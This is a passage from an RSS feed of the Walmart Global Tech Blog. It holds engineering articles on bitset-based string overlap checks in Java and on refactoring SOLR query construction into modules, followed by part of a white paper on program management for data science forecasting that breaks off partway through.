            <content:encoded><![CDATA[<h3>Introduction</h3><p>Ever wondered why your backend slows to a crawl when comparing massive sets of strings? Here’s how we turned a bottleneck into a lightning-fast operation using bitsets.</p><p>Efficiently checking for overlaps between large sets of strings is a common challenge in high-throughput backend services. Traditional approaches — such as nested loops or hash-based comparisons — can quickly become performance bottlenecks, especially as data volumes scale and both memory and response time are critical.</p><p>This is particularly true in environments like Walmart’s, where backend systems routinely process millions of records per second to power search, recommendation, and fraud detection features. As our applications grew, we observed that even well-optimized hash set operations struggled to keep up with the demands of real-time processing.</p><p>In this blog, I’ll share how we leveraged bitset optimization to transform our string set overlap checks.</p><h3>The Problem: When “Fast Enough” Isn’t Enough</h3><p>Our service is designed to handle high volumes of requests, each containing multiple sets of strings mapped to unique keys — such as user IDs, product SKUs, or transaction identifiers. For every incoming key, we must efficiently retrieve the corresponding set of strings from our backend database and determine if there is any overlap with the provided set in the request.</p><p>This overlap check is a critical step in workflows like deduplication, access control, and real-time validation. However, as the number of keys and the size of each string set grow, the computational and memory demands of these operations can escalate rapidly.</p><h3>The Memory Bottleneck</h3><p>To mitigate performance bottlenecks, we initially explored caching the database string sets locally within each pod. While this approach did improve lookup speed, it introduced a new challenge: memory consumption. As our dataset grew, the memory footprint of these in-memory caches ballooned, reaching as high as an unsustainable level in the worst-case scenarios. This strained our infrastructure resources and increased the risk of out-of-memory errors.</p><h3>The Naive Approach</h3><p>Traditional approaches, such as iterating through sets or leveraging hash-based comparisons, often struggle to keep pace under heavy load.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/936/0*oz_XzKcrkmUlHnrO.png" /></figure><p>Each comparison required iterating through potentially thousands of strings, resulting in operations with time complexity proportional to the product of the set sizes. Under peak load, this led to noticeable spikes in response times. Even with optimized algorithms, the sheer scale of data made it difficult to achieve the low-latency guarantees required by our backend systems.</p><pre>// Traditional Hash-based approach<br>public boolean overlap(Set&lt;String&gt; setA, Set&lt;String&gt; setB) {<br>    // This often involves iterating over the smaller set <br>    // and checking for existence in the larger set.<br>    for (String s : setA) {<br>        if (setB.contains(s)) {<br>            return true;<br>        }<br>    }<br>    return false;<br>}</pre><p>While accurate, this approach struggles under heavy load13. Each comparison requires iterating through potentially thousands of strings14. The time complexity is roughly proportional to the product of the set sizes O(N * M) or best case O(N) with hash sets), which quickly becomes a nightmare at scale15. Under peak load, this caused noticeable spikes in response times16.</p><h3>Enter Bitsets: The “Secret Weapon”</h3><p>To address these challenges, we implemented a bitset-based optimization.</p><h3>How It Works</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/936/0*lbXSrxJcMlgPQi2E.png" /></figure><ol><li><strong>Unique String Mapping:</strong> Assign a unique integer index to every distinct string across all sets (e.g., “xxxxx” → 1).</li><li><strong>Bitset Representation:</strong> Represent each set of strings as a bitset, where the bit at position i is set to 1 if the string with index i is present in the set.</li></ol><pre>Universe: [&quot;apple&quot;, &quot;banana&quot;, &quot;carrot&quot;]<br>Index:    { &quot;apple&quot;: 0, &quot;banana&quot;: 1, &quot;carrot&quot;: 2 }</pre><pre>Set A: {&quot;apple&quot;, &quot;carrot&quot;}  -&gt; Bits: 1 0 1<br>Set B: {&quot;banana&quot;}           -&gt; Bits: 0 1 0<br>Set C: {&quot;apple&quot;}            -&gt; Bits: 1 0 0<br>// Set A and Set C can easily got intersection of &quot;apple&quot;</pre><h3>The Implementation</h3><p>Here is the core logic for converting strings to bitsets and checking for overlaps:</p><pre>import java.util.*;</pre><pre>public class BitSetStringOverlap {<br>    // Map each string in the universe to a unique bit position<br>    private static Map&lt;String, Integer&gt; buildUniverseIndex(List&lt;String&gt; universe) {<br>        Map&lt;String, Integer&gt; indexMap = new HashMap&lt;&gt;();<br>        for (int i = 0; i &lt; universe.size(); i++) {<br>            indexMap.put(universe.get(i), i);<br>        }<br>        return indexMap;<br>    }</pre><pre>    // Convert a set of strings to a BitSet<br>    private static BitSet stringsToBitSet(Set&lt;String&gt; strings, Map&lt;String, Integer&gt; universeIndex) {<br>        BitSet bitSet = new BitSet(universeIndex.size());<br>        for (String s : strings) {<br>            Integer idx = universeIndex.get(s);<br>            if (idx != null) {<br>                bitSet.set(idx);<br>            }<br>        }<br>        return bitSet;<br>    }</pre><pre>    // Check if two BitSets overlap<br>    private static boolean overlap(BitSet a, BitSet b) {<br>        BitSet clone = (BitSet) a.clone();<br>        clone.and(b);<br>        return !clone.isEmpty();<br>    }<br>}</pre><p>With bitsets, overlap checks are reduced to a single bitwise AND operation. If the result is non-zero, an overlap exists. This approach is orders of magnitude faster than traditional set intersection algorithms.</p><h3>Architecture: Decoupling for Speed</h3><p>We didn’t just change the code; we changed the architecture to decouple latency-sensitive operations from heavy string processing.</p><ul><li>Centralized Index: We maintain a consistent mapping between each unique string and its corresponding bit position, stored centrally in a SQL database.</li><li>Offline Storage: We shifted from storing raw string arrays in the database to storing their compact bitset representations. When a new string set is persisted, we encode it as a bitset immediately.</li><li>On-the-fly Processing: For incoming requests, we apply the same index mapping on-the-fly, converting the provided string sets into bitsets in real time.</li></ul><h3>The Impact: Crunching the Numbers</h3><p>Switching to bitsets delivered tangible benefits to our backend systems. The contrast between the old approach and the new bitset optimization is stark:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rDAmTiUSckT0Lhhf5oILVA.png" /></figure><h4>In our application we observe following optimization</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*grK0zvQmNuNtUmzlm3RQXQ.png" /></figure><p>We drastically reduced the memory footprint required for both caching and storage, preventing the “Ouch!” moments of hitting memory limits.</p><h3>Practical Considerations</h3><p>While bitsets are powerful, there are a few things to keep in mind when implementing them:</p><ul><li>The Universe Index: You need a consistent “universe” of strings. We maintain a centralized index mapping in a SQL database to ensure all services speak the same “bit language”.</li><li>Decoupling: This architecture allows us to decouple latency-sensitive operations. Heavy string processing is done offline, while the live request path only handles fast bitwise math.</li><li>When NOT to use: If your universe of strings is infinitely growing with no central management, or if the sets are extremely sparse over a massive range without compression, standard bitsets might need tuning (like Roaring Bitmaps) to remain efficient.</li></ul><h3>Conclusion</h3><p>By transforming string set overlap checks into bitset operations, we achieved substantial improvements in both performance and resource utilization. This strategy is particularly effective for large-scale, high-frequency set operations typical in distributed systems like ours.</p><p>If you’re building high-throughput systems and struggling with memory or latency during set comparisons, bitsets might just be your secret weapon.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=412911bfc3d5" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/how-bitsets-supercharged-our-backend-faster-string-overlap-checks-at-scale-412911bfc3d5">How Bitsets Supercharged Our Backend: Faster String Overlap Checks at Scale</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Modularizing SOLR Query Creation for Multi-Market Scale]]></title>
            <link>https://medium.com/walmartglobaltech/modularizing-solr-query-creation-for-multi-market-scale-a1f34e28b631?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/a1f34e28b631</guid>
            <category><![CDATA[monolithic-architecture]]></category>
            <category><![CDATA[software-architecture]]></category>
            <category><![CDATA[information-retrieval]]></category>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[modular-monolith]]></category>
            <dc:creator><![CDATA[Naman Parikh]]></dc:creator>
            <pubDate>Tue, 03 Mar 2026 12:18:55 GMT</pubDate>
            <atom:updated>2026-03-03T12:18:54.547Z</atom:updated>
            <content:encoded><![CDATA[<h3><strong>Introduction</strong></h3><p>When the SOLR query logic expanded into a 12,000-line monolithic implementation, each modification introduced significant risk, making every change feel akin to defusing a critical system. Adding a market-specific override required yet another if block, compounding complexity and slowing time-to-market. In this article, we will deep dive how we broke that SOLR query creation logic, enabling clean configuration per market, stronger typing, reducing technical debts and dramatically reduced runtime errors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*up02Of4XYIr14OKR-ifRJw.png" /><figcaption>Image generated with DALL·E via ChatGPT</figcaption></figure><h3>The Problem: When SOLR Queries Creation Logic Become Technical Debt</h3><p>The SOLR query logic class was handling filtering logic, boosting logic, boost functions, pagination etc. All the parameters related to SOLR query was getting generated using single class. Overthe time, this core class handled various logics related to different type of queries:</p><ul><li>Primary search queries</li><li>Item insertions via business tools</li><li>Item insertions via semantic sources</li></ul><p>Thousands of lines tangled edge-case handling, scoring tweaks, and boosting logic. This unscalable approach:</p><p>Blocked rapid iteration for new markets</p><ul><li>Tight Coupling: All query-handling logic lived in one massive class, making it difficult to cleanly separate concerns. Market-specific changes could unintentionally affect unrelated logic, requiring exhaustive regression testing.</li><li>High Risk of Unintended Consequences: Changing business requirements (such as supporting different filtering or boosting strategies for a new market) entailed changing existing code that already served other markets. Developers had to be extremely cautious, as a bug or oversight could break unrelated functionality.</li><li>No Configuration Flexibility: There was no clear system for externalizing market-specific configuration. Instead, all logic changes happened directly in code, preventing business users or product managers from making simple market changes without developer intervention.</li></ul><p>Increased Runtime exceptions</p><ul><li>Lack of strong typing: In the monolith implementation, parameters for various queries (filter, boost, facet, etc.) were often handled as generic objects, maps, or loosely typedstructures. Whenever code tried to cast a parameter to the expected type without proper validation, a ClassCastException or NullPointerException would occur if the object wasmissing or the wrong type.</li></ul><p>Made testing and debug painful</p><ul><li>No isolation: With all logic in one class, you couldn’t test a single part (e.g., boost setup or filter logic) in isolation. Every change risked breaking other unrelated query paths.</li><li>Opaque Error Sources: When a test failed or an exception was thrown, the error stack trace typically pointed to a dense method with dozens of responsibilities. Tracing the root cause involved manually reviewing many conditionals and nested logic blocks.</li><li>Manual validation required: Since types weren’t enforced, developers had to write extra validation code or rely heavily on manual testing, which is error-prone and slow.</li></ul><h3>Motivation for a Modular Architecture</h3><p>The monolithic SOLR query logic introduced multiple pain points: tight coupling that made changes risky, lack of configuration flexibility forcing code edits for market-specific needs, runtime exceptions due to weak typing, and opaque error sources that slowed debugging. These issues made it difficult to scale across markets, slowed down development, and increased the risk of unintended consequences.</p><p>To overcome these challenges, we needed a new approach — one that would allow us to separate concerns, improve testability, and support market-specific configurations without duplicating logic. This led us to adopt a <strong>modular architecture</strong> for SOLR query creation.</p><p>To bring order to chaos, we defined a few clear goals:</p><ul><li><strong>Modularize query creation</strong> to separate concerns and make the system testable and extendable.</li><li><strong>Support multiple markets</strong> from a single codebase, without duplicating or entangling logic.</li><li><strong>Reduce technical debt</strong> by identifying and removing outdated code paths and unused toggles.</li><li><strong>Single responsibility principle </strong>to be used to create a single module responsible for Retrieval. This is needed to separate it out from other core pieces of Search like Query Understanding, Ranking.</li><li><strong>Ease out feature development </strong>by reducing the number of files to be changed to rollout a feature. This is needed to reduce development time, testing time and release feature with a greater amount of confidence</li><li><strong>Strongly typed parameters</strong> to eliminate runtime casting errors</li><li><strong>Testability</strong> through small, focused classes</li></ul><h3>Solution Overview</h3><p>At the heart of this new design was a simple idea: treat the SOLR query as a POJO (Plain Old Java Object). Additionally, there are few other components:</p><ol><li>SOLR Query</li><li>Query Param Creator</li><li>Query Param Module</li><li>Query Assembler</li><li>Query Override Handler</li></ol><p><strong>Illustrative Example: Modular Query for a Bookstore Search</strong></p><p>Imagine you’re building a search system for an online bookstore. A user might search for “science fiction books under $20.” Here’s how modular query creation would work -</p><p>Solr Query POJO would have these objects:</p><ul><li><strong>FilterQueryParam</strong>: Filters by genre = “Science Fiction” and price &lt; $20</li><li><strong>BoostQueryParam</strong>: Boosts books with high ratings or recent publications</li><li><strong>FacetQueryParam</strong>: Adds facets for author, publisher, and publication year</li><li><strong>SortQueryParam</strong>: Sorts results by relevance or price</li><li><strong>FieldListParam</strong>: Specifies which fields (title, author, price) to return</li></ul><p>Each of these parameters is created by its own <strong>QueryParamCreator</strong>, wrapped in a <strong>QueryParamModule</strong>, and assembled into a final <strong>SolrQuery</strong> using the <strong>QueryAssembler</strong>.</p><p>This modular approach allows you to plug in different logic for different use cases — say, searching vs inserting new books — without touching the core query-building logic.</p><p>1. SOLR Query</p><p>We introduced a central SOLR Query that represents the full query. This Object is composed of smaller Param objects like:</p><ul><li>FilterQueryParam</li><li>BoostQueryParam</li><li>FacetQueryParam</li><li>…</li></ul><p>Below is an illustrative diagram:</p><p><strong>Before:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/694/1*JWtoOjwDjL5E7G5UUpx3qg.png" /></figure><pre>Map &lt;String, Object&gt; solrQueryParamsMap = new HashMap&lt;&gt;();<br>solrQueryParamsMap.put(“fq”, Arrays.asList(“”));<br>solrQueryParamsMap.put(“bq”, Arrays.asList(“”));<br>solrQueryParamsMap.put(“facet.query”, “”);<br>solrQueryParamsMap.put(“sort”, “asc”); solrQueryParamsMap.put(“sort.field”, Arrays.asList(“”));</pre><p><strong>After:</strong></p><pre>public class SolrQuery {<br>  private FilterQueryParam filterQueryParam;<br>  private BoostQueryParam boostQueryParam;<br>  private FacetQueryParam facetQueryParam;<br>  private SortQueryParam sortQueryParam;<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/902/1*35KSDHLROKofosrFZyVbOA.png" /></figure><p>2. Query Param Creator:</p><p>Each of these POJOs maps <strong>1:1 to a Query Creator</strong> interface.</p><pre>public interface SolrParamCreator&lt;T extends AbstractSolrParam&gt; {<br> T create(BaseRequest r);<br>}<br><br>public class FilterQueryParamCreator implements SolrParamCreator&lt;FilterQueryParam&gt; {<br> public FilterQueryParam create(BaseRequest r);<br>}</pre><p>Each creator has <strong>multiple implementations</strong>, allowing us to plug in logic based on:</p><ul><li>Use case (search vs insertion)</li><li>Features</li><li>Experiments or business overrides</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UeTZAqwXe01iAboGhetukA.png" /><figcaption>Query Param Creator Diagram</figcaption></figure><p>3. Query Param Module:</p><p>Query Param Module encompasses Creator and its corresponding Query Param.</p><pre><br>public interface QueryParamModule&lt;R&gt; {<br> void apply(SolrQuery solrQuery, BaseRequest r) <br>}<br><br>public class FilterModule implements QueryParamModule&lt;BaseRequest&gt; {<br> private final FilterQueryParamCreator creator;<br> <br> public void apply(SolrQuery q, BaseRequest r) {<br>  q.setFilterQueryParam(creator.create(q));<br> }<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wIKWc0hQDhyrpd90AG-4bA.png" /><figcaption>Query Param Module Diagram</figcaption></figure><p>4. Query Assembler</p><p>The idea is to:</p><ul><li>Define a common interface</li><li>Wrap each creator and setter in a module</li><li>In assembler, keep a list of module and loop through.</li></ul><p>This allows us to have benefits of:</p><ul><li><strong>Open/closed</strong>: Add new query-param modules without touching existing code.</li><li><strong>Single loop</strong>: Have all setter in one loop in assembler.</li><li><strong>Testable units</strong>: Each module can be unit-tested in isolation.</li></ul><pre>public class QueryAssembler {<br>   private final List&lt;QueryParamModule&lt;BaseRequest&gt;&gt; modules;<br> <br>   public SolrQuery assemble(BaseRequest request) {<br>       SolrQuery solrQuery = new SolrQuery();<br>       for (QueryParamModule&lt;BaseRequest&gt; module: modules) {<br>           module.apply(solrQuery, request);<br>       }<br>       return solrQuery;<br>   }<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/628/1*oo7WV3DJNnIp7FYDFXKetA.png" /></figure><p>5. Query Override Handler</p><p>Query Override Handler is used to override the SOLR query object by putting some business rules on top of usual execution.</p><pre>public interface SolrQueryOverrideHandler {<br>    void override(BaseRequest r, SolrQuery solrQuery);<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/574/1*9H6xcUmd5dBWSFAjRG-RYQ.png" /><figcaption>Solr Query Override Handler Diagram</figcaption></figure><p>In addition to these components, we ensured that every deep nested core logic is behind a feature flag which can be configured for each market to quickly enable/disable a feature.</p><h3>Migration Strategy</h3><ol><li><strong>Phase 1</strong>: Wrap existing class in facade calling new creators.</li><li><strong>Phase 2</strong>: Gradually redirect code paths to QueryAssembler.</li><li><strong>Phase 3</strong>: Remove legacy monolith class after coverage and stability targets met.</li></ol><p>All changes were backed by unit and integration tests configured via CI pipelines.</p><h3>Results &amp; Metrics</h3><ul><li><strong>Query development time</strong> for new markets reduced from 3 days to 3 hours</li><li><strong>Feature sharing </strong>is possible between markets with a config change</li><li><strong>Around 100 legacy features</strong> got deprecated which were not in use</li><li><strong>NullPointer &amp; ClassCast exceptions</strong> dropped by 95%</li><li><strong>Code complexity</strong> (Cyclomatic) decreased by 40%</li></ul><h3>Lessons Learned</h3><ul><li><strong>Strong typing</strong> prevents more bugs upstream than exhaustive tests.</li><li><strong>Configuration-driven overrides</strong> keep code clean and markets flexible.</li><li><strong>Diagram early</strong>: Sharing architecture visuals aligned team understanding.</li></ul><h3>Conclusion &amp; Actionable Takeaways</h3><p>By modularizing SOLR query creation, you can rapidly onboard new markets, reduce bugs, and improve developer productivity. Key steps to apply:</p><ol><li>Define clear parameter objects.</li><li>Encapsulate cross-cutting logic in focused creators.</li><li>Use a single assembler facade.</li><li>Migrate incrementally, with tests guarding each stage.</li></ol><p>Ready to break your own monolith? Start by identifying your first module boundary and sketching the data flow!</p><p>#Engineering #SoftwareArchitecture #ModularMonolith #MonolithicArchitecture #SoftwareDevelopment #Retrieval #Solr</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a1f34e28b631" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/modularizing-solr-query-creation-for-multi-market-scale-a1f34e28b631">Modularizing SOLR Query Creation for Multi-Market Scale</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[White Paper on Data Science Technical Program Management]]></title>
            <link>https://medium.com/walmartglobaltech/white-paper-on-data-science-technical-program-management-08dc2535bd1a?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/08dc2535bd1a</guid>
            <category><![CDATA[technical-program-manager]]></category>
            <category><![CDATA[leadership]]></category>
            <category><![CDATA[data-science]]></category>
            <category><![CDATA[machine-learning]]></category>
            <category><![CDATA[software-engineering]]></category>
            <dc:creator><![CDATA[Sonu Jain]]></dc:creator>
            <pubDate>Fri, 27 Feb 2026 12:41:46 GMT</pubDate>
            <atom:updated>2026-02-27T12:41:45.314Z</atom:updated>
            <content:encoded><![CDATA[<p><strong>1.</strong> <strong>Abstract</strong></p><p>Managing Data Science programs requires a structured approach to handle the complexities of data, model development, and business alignment. This whitepaper provides a comprehensive guide on the effective program management of Data Science programs by technical program managers. It highlights the critical role of Technical Program Managers (TPMs) in driving successful execution and outlines the key phases, challenges, and recommended best practices at every stage for effectively managing Data Science programs</p><p>This white paper is grounded in a real-world inventory forecasting initiative aimed at improving stock availability and reducing overstock across multiple retail categories. The program involved cross-functional collaboration between Data Science, Engineering, Product, and Business teams to build predictive models that could dynamically adjust inventory levels based on demand signals.</p><p><strong>2.</strong> <strong>Introduction</strong></p><p>Data Science has become a critical pillar of decision-making across industries, but organizations continue to struggle with operationalizing these initiatives. Unlike software development, which follows predictable sprint cycles, Data Science programs are inherently experimental — requiring repeated cycles of data validation, model training, and retraining before they reach acceptable performance levels. This uncertainty often leads to misaligned expectations, delays in delivery, and inconsistent business impact.</p><p>The iterative nature of model development makes predictability especially challenging: teams may require multiple iterations to achieve coverage and accuracy thresholds that satisfy business needs. Without structured program management, these efforts risk becoming siloed experiments rather than scalable, value-generating solutions.</p><p>This whitepaper aims to address this gap by providing a practical framework for Technical Program Managers (TPMs) to manage Data Science programs effectively. It draws on real-world experience from a large-scale inventory forecasting initiative to illustrate how TPM-led governance, alignment, and phased execution can bring discipline and predictability to an otherwise experimental process.</p><p><strong>3.</strong> <strong>Methodology</strong></p><p>Managing a Data Science program requires more than adopting standard Agile rituals or deploying models on cloud platforms. The critical differentiator lies in <strong>adapting these methods to the inherently experimental nature of Data Science.</strong></p><p>Our approach began with a deep dive into the <strong>business context</strong> — identifying objectives like minimizing stockouts, optimizing inventory turnover, and improving forecast accuracy. From there, we established a <strong>cross-functional operating model</strong>, ensuring early alignment between Data Scientists, Engineers, Analysts, and Business stakeholders. This upfront alignment reduced rework and prevented scope creep once modelling iterations began.</p><p>To introduce predictability into what is often a non-linear process, we designed a <strong>custom governance framework</strong>. Sprint cycles were defined not just for coding, but for each stage of the Data Science lifecycle: requirements (BRD to PRD), data collection, feature engineering, model training, validation, and deployment. Each stage had <strong>gated progression</strong>, reviewed jointly by technical and business owners, ensuring that models advanced only when quality and coverage thresholds were met.</p><p>Tools like Jira, CI/CD pipelines, and cloud platforms (AWS/GCP/Azure) were not used “off the shelf,” but <strong>tailored to Data Science needs</strong>. For example, Jira workflows were restructured to mirror the DS lifecycle, complete with dashboards that tracked experiment status, model readiness, and business validation. CI/CD pipelines were extended to handle <strong>model versioning and automated retraining triggers</strong>, while cloud resources were provisioned at kick-off to avoid compute bottlenecks during large-scale back testing.</p><p>This tailored methodology allowed us to maintain <strong>scientific rigor in experimentation</strong> while still providing <strong>program-level visibility and predictability</strong> — a balance that is often missing in Data Science initiatives.</p><p><strong>4.</strong> <strong>Data Science Delivery Lifecycle: Challenges and TPM Playbook</strong></p><p>Managing data science programs is not just about tracking experiments or collecting metrics. It’s about navigating unknowns, connecting fragmented teams, and unlocking value in a highly iterative environment. While we describe the lifecycle in distinct phases for clarity, the reality is more dynamic: discoveries in later stages often require revisiting earlier steps — such as refining success metrics after validation insights or adjusting data sourcing based on modelling outcomes. This flexibility is intentional and built into the framework, ensuring that the process remains adaptive and responsive to new learnings. Let me brief how as TPM we systematically tackled risks of a real replenishment/Dynamic Inventory, forecasting initiatives across key phases of product lifecycle.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*EbHg4K_yM0oViBC4mdwXCw.png" /></figure><p><strong>Phase 1: Business Understanding</strong></p><p>The priority was to ensure the program was tied to business outcomes, with a clear measure of success.</p><p>For demand forecasting, this meant predicting demand at a geo level with higher accuracy than existing models — directly influencing inventory planning and working capital. Forecast inaccuracies have a tangible dollar impact on the business — under‑forecasting leads to lost revenue from stock‑outs, while over‑forecasting increases inventory carrying costs and potential disposition losses. Success was therefore measured using Mean Absolute Percentage Error (MAPE), with accuracy improvements explicitly mapped to reduced business loss, lower excess inventory, and improved working capital efficiency.</p><p><strong>Challenge — Balancing Speed and Accuracy</strong></p><p>Data Science timelines are inherently iterative, while Engineering works in structured sprints. This mismatch often led to tentative ETAs, multiple revisions, and misaligned expectations. In the initial forecasting use case, model outputs required several iterations to reach accuracy targets, causing uncertainty in downstream engineering integration.</p><p><strong>TPM Intervention</strong></p><p>To bridge the gap between business expectations and data science experimentation, the TPM established a unified success measurement framework at program initiation. The goal was to define clear metrics outlining how business impact would be measured, tracked, and reviewed throughout the lifecycle.</p><p>All teams — Data Science, Product, and Business — aligned on baseline accuracy benchmarks and target improvement thresholds before modelling began. Milestone-based checkpoints linked performance metrics such as MAPE to tangible business outcomes like reduced forecast error and optimized inventory levels. A structured review cadence focused discussions on business value realization rather than technical progress alone.</p><p>By institutionalizing success measurement early, the TPM ensured transparency, strengthened stakeholder alignment, and enabled data-driven trade-offs between experimentation time and business value, anchoring technical progress to strategic objectives.</p><p>Additionally, various approaches were planned upfront with business collaboration starting with coverage and adoption, then moving to accuracy so delivery could follow an iterative fashion, building confidence at each milestone. This gave the business confidence that delivery was planned and predictable, not left to chance.</p><p><strong>Key Takeaway</strong></p><p>The Business Understanding Phase should define a <strong>clear measure of success</strong>. This will be the anchor in subsequent stages and will help in reducing uncertainty.</p><p><strong>Phase 2: Data Sourcing and Transformation</strong></p><p>This phase focused on identifying the right data sources, validating their reliability, correctness and completeness, and ensuring they could be transformed into scalable, compliant pipelines.</p><p><strong>Challenges — Data Quality Uncertainty</strong></p><p>Inaccurate or incomplete data reduced signal strength and model reliability. For example, customer address data was missing in some upstream systems, while sales data arrived in a different time zone than address data — leading to misalignment in outputs.</p><p>Schema Ambiguity: Schema documentation was often missing or incomplete. Similar-sounding fields (e.g., customer_id vs cust_id) could represent different entities, creating confusion and risk during feature engineering.</p><p>Data Duplication: Same data appeared in multiple sources with inconsistencies, making it hard to determine the source of truth and ensure consistency.</p><p><strong>TPM Intervention</strong></p><p>The TPM brought together Data Science, Engineering, and Product in a workshop to co-create a workaround: returning customers were aggregated via customer ID, while new customers were mapped to the highest-sales zip. A specific data quality Data Quality Score (DQS) was introduced. This was based on completeness, consistency, and timeliness, with a minimum threshold of 95% completeness and &lt;2% time zone mismatch tolerance before data was accepted for modelling. With QA coverage and team signoffs, this became a repeatable solution, enabling retraining on enriched data and reducing business impact.</p><p><strong>Schema Contracts:</strong> Introduced upfront schema definition and approval process involving <strong>Data Engineering, Data Science, and Product teams </strong>to reduce ambiguity.</p><p><strong>Deduplication Checklist: </strong>Established a rule that Data Science teams only use Engineering-provided data/data sources as the source of truth.</p><p><strong>Key Takeaway</strong></p><p>Anticipate and resolve data quality gaps using guardrails and thresholds. Introduce specific <strong>Data Quality metrics</strong> (e.g., completeness, consistency, timeliness) to measure and enforce standards. Address schema ambiguity and duplication early through <strong>schema contracts</strong> and <strong>source-of-truth policies</strong> before modelling begins.</p><p><strong>Phase 3: Modelling</strong></p><p>This phase focused on building scalable data science models while balancing exploration with predictable delivery. The team defined baselines, ran systematic experiments, and optimized for both accuracy and infrastructure cost.</p><p><strong>The modelling framework has the following dimensions of experimentation</strong></p><p><strong>Multiple Model frameworks:</strong> Multiple families of models are evaluated in parallel. Examples: statistical baselines such as Autoregressive Integrated Moving Average/ Error Trend Seasonality model [ARIMA/ETS], tree-based approaches such as XGBoost/LightGBM, and deep learning architectures like Multi-Horizon Recurrent Neural Networks [MHRNNs].</p><p><strong>Multi-horizon forecasting:</strong> Multiple horizons of forecasting are addressed simultaneously: Short-term (1–4 weeks), medium-term (5–12 weeks), and long-term (13+ weeks) horizons.</p><p><strong>Multiple sources of external inputs:</strong> Models trained on Uber H3 Level 7 hexagonal clusters, external market research data inputs.</p><p><strong>Multiple Learning mechanisms:</strong> Sequential learning to capture temporal dependencies, seasonality &amp; trend modelling, and integration of external factors such as promotions, weather, and macroeconomic signals.</p><p><strong>Feature Selection:</strong> An essential part of modelling is choosing which features from the dataset to include during training and inference. Selecting the right features ensures the model focuses on variables that truly influence outcomes, improving accuracy and reducing complexity. For example, in demand forecasting, historical sales, seasonality, and promotions are relevant, while internal IDs or random codes add no predictive value and should be excluded.</p><p><strong>Challenges<br> </strong>Data Science experimentation often caused missed deadlines — accuracy fluctuated across iterations, and coordination issues during integration slowed down progress.</p><p><strong>Effort vs. Output Misalignment: </strong>Building models often requires multiple iterations, and failures are common, so the visible output may not reflect the effort invested.</p><p><strong>TPM Intervention</strong></p><p>· <strong>Work Modularization:</strong> Broke modelling into distinct work units, enabling early engineering handoffs while Data Science iterated further.</p><p>· <strong>Parallelization:</strong> While one model group moved into engineering validation, others continued in experimentation.</p><p>· <strong>Segmentation:</strong> Models organized by forecast horizon (short vs. long) and SKU type (low/medium/high velocity, new items) to align iterations with business needs.</p><p>· <strong>Iteration Planning:</strong> Each group followed 2–3 sprint cycles with checkpoints for feature enrichment, validation, and stakeholder review. Prioritization focused on high-velocity SKUs and new launches.</p><p>· <strong>Governance:</strong> Central dashboards tracked model progress, validation status, and readiness for deployment, giving stakeholders real-time visibility.</p><p><strong>Introduced few Predictability Mechanisms</strong></p><p>· <strong>Defined </strong>iteration cycles<strong> (2–3 sprints per model group).</strong></p><p>· Validation gates<strong> at each cycle using thresholds (MAPE, RMSE, recall/precision benchmarks).</strong></p><p>· <strong>Early handoffs</strong>: Once a model crossed baseline performance, partially validated versions were transferred to Engineering.<strong> </strong>This allowed<strong> </strong>pipeline and integration<strong> testing in parallel</strong> with ongoing DS refinements.</p><p>· <strong>Stakeholder checkpoints</strong> ensured business validation before downstream adoption.</p><p><strong>Outcome<br> </strong>This structure brought predictability and brought enabled end-to-end optimization, accuracy improved steadily across cycles, early validations reduced integration risk, and the models ultimately supported smarter inventory decisions across geo-clusters.</p><p><strong>Documentation:</strong> Established a structured process to capture failed experiments, document reasons for failure, and log effort invested. This ensures transparency, preserves learnings, and prevents repeated mistakes.</p><p><strong>Key Takeaway</strong></p><p><strong>Modularize the model work</strong>, to enable parallel work across Data Science and Engineering teams.</p><p><strong>Phase 4: Implementation &amp; Validation</strong></p><p>This phase emphasized ensuring that forecasts were both statistically reliable and practically usable for business operations. Beyond accuracy metrics, the focus was on building trust with stakeholders and ensuring seamless integration into production systems.</p><p><strong>Challenge — Business Trust and Production Readiness</strong><br> While the models met validation thresholds (MAPE, BIAS), business teams were hesitant to adopt them due to under-forecasting for new SKUs and concerns about stability in production. This created a gap between technical validation and operational confidence.</p><p><strong>Model Drift Over Time:</strong> Once deployed, models may lose accuracy because the real-world data distribution changes. The datasets used for initial training may no longer represent current conditions, leading to degraded performance.</p><p><strong>TPM Intervention</strong><br> To bridge this gap, mandated that <strong>user validation scenarios</strong> be defined upfront as part of the planning cycle, ensuring that evaluation criteria were business-driven and aligned with operational needs. To avoid downstream delays, ensured these scenarios to be ready before modelling began, creating clarity on success metrics early. In parallel, the TPM brought <strong>Data Engineering</strong> into the process from the start, enabling pipelines to be built alongside model development rather than after, which reduced bottlenecks during integration. Also introduced business teams to use dashboards to continuously compare forecasts against actuals, ensuring models remain reliable and do not drift over time. This visibility enables early detection of performance degradation and triggers retraining workflows when needed.</p><p><strong>Outcome</strong><br> Business gained confidence through clear visibility into model behaviour, while engineering ensured reliability at scale. Phased adoption across categories reduced operational risk and accelerated trust-based deployment.</p><p><strong>Key Takeaway</strong></p><p>Work with business stakeholders during planning to decide <strong>upfront the validation scenarios</strong>. 